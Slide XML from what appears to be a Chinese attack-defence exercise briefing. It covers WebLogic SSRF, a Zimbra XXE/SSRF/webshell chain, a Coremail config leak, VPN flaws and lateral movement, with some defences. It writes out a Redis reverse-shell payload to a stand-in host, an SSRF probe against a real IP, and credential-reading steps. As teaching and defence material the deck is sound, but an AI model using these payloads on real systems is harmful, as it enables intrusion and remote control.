              <a:t>行动期间，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>号之前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>已经披露</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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奇安信、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> 360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知道创宇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>…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1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144" y="2395883"/>
            <a:ext cx="5753100" cy="180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sk-SK" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="sk-SK" dirty="0"/>
              <a:t>利用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SSRF-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：探测（预演习案例）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0"/>
              <a:t>://114.247.107.57:81/uddiexplorer/SearchPublicRegistries.jsp?operator=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hTtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0"/>
              <a:t>://127.0.0.1:22&amp;rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>selfor=Business+location&amp;btnSubmit=Search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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="D:\护网行动\SSRF-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7750"/>
            <a:ext cx="9063990" cy="194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D:\护网行动\SSRF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7334"/>
            <a:ext cx="9063990" cy="229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sk-SK" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="sk-SK" dirty="0"/>
              <a:t>利用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SSRF-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>1 "\n\n\n\n* * * * root bash -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&gt;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>xx.xx.xx.xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/8888 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&gt;&amp;1\n\n\n\n" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>etc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config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>dbfilename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crontab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save</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>operator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>://172.21.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F8888%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://upload-images.jianshu.io/upload_images/7119304-b416d14254fb1b9e.png?imageMogr2/auto-orient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9070"/>
            <a:ext cx="9144000" cy="28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685800" lvl="2">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Zimbra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 组合式漏洞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XXE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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>、任意文件上传</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Zimbra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>CVE-2019-9670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CVE-2019-9621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组合利用各个漏洞达到最终控制服务器</a:t>
            </a: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XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>CVE-2019-9670</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>）：读取全局管理员安装口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/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localconfig.xml: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>zimbra_admin_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>zimbra_ldap_password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> CVE-2019-9621 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>接口绕到本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>7071</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>端口获取高权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>token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zh-CN" sz="1400" dirty="0"/>
              <a:t>https://target.com/service/proxy?target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://127.0.0.1:7071/service/admin/soap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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上传点：上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>JSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>到特定位置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攻防关键技术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685800" lvl="2">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Zimbra:CVE-2019-9670</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞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1400" dirty="0" err="1"/>
              <a:t>AutoDiscoverServlet.class</a:t>
            </a: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1400" dirty="0"/>
              <a:t>CFG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>doPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>getTagValue</a:t>
            </a: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400" dirty="0"/>
              <a:t>参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>EMailAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>     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AcceptableResponseSchema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8402"/>
            <a:ext cx="5749290" cy="3858732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="https://img-blog.csdnimg.cn/20190406125455933.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTczMjQzMA==,size_16,color_FFFFFF,t_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60" y="1547048"/>
            <a:ext cx="4091940" cy="311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063095" y="4950116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POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：任意文件读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228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004098"/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攻防演习概况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/>
              <a:t>背景介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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/>
              <a:t>国内外重大攻防演习</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="004098"/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marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004098"/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攻防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004098"/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关键技术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攻击路径及关键技术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典型攻防案例解析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通用</a:t>
            </a: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防护方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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及</a:t>
            </a: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挑战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marL="228600" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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marL="228600" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN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总结</a:t>
            </a:r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685800" lvl="2">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Coremail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信息泄露漏洞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1400" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>://*****/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>mailsms/s?func=ADMIN:appState&amp;dumpConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>=/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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42" y="2036617"/>
            <a:ext cx="6534123" cy="46034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685800" lvl="2">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Coremail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息泄露漏洞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400" dirty="0"/>
              <a:t>某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>电站疑似被攻击的报警记录</a:t>
            </a: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820918"/>
            <a:ext cx="7319939" cy="28470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3749040"/>
            <a:ext cx="7319939" cy="2858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077686"/>
            <a:ext cx="8372163" cy="5577114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" lvl="2">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网络边界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>设备漏洞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HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>期间传国内某厂商</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>设备存在安全漏洞，截图流出：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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国外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>此类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>设备漏洞并不鲜见：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>CISCO ASA\Palo Alto\Check Point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>均爆出过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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国内的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>SSL VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>设备也均存在不同程度的安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>应用架构与系统紧密耦合，高度定制，存在不少安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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2" y="2083191"/>
            <a:ext cx="4189615" cy="3118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685800" lvl="2">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网络边界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>设备漏洞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800" dirty="0"/>
              <a:t>此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>类漏洞常见利用方法：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作为据点探测内网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劫持正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>会话，窃取权限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记录正常用户口令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添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>账户和资源组，获取内网资源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加密通道中转数据</a:t>
            </a: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防御对抗：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双因素认证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账户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>登陆监测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加密数据流量异常检测</a:t>
            </a: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dirty="0"/>
              <a:t>增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>内网的认证应用，增加利用难度（硬件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>VPN+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Citrix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>应用）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：从内到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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/>
              <a:t>内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>网拓展渗透主要包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>隐蔽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>探测、横向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>、数据回传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/>
              <a:t>隐蔽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>探测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在不被杀软和防火墙发现的提前下，从入侵的据点探测周边网络环境（包含免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>，转发代理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>扫描）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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横向拓展：内网横向移动，根据搜集的信息渗透特定主机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数据回传：将重要数据、内网信息等数据加密隐蔽回传</a:t>
            </a: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zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>上述三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>不同攻击的向量相互配合，其控制流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基础设施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、功能代码、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通信协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
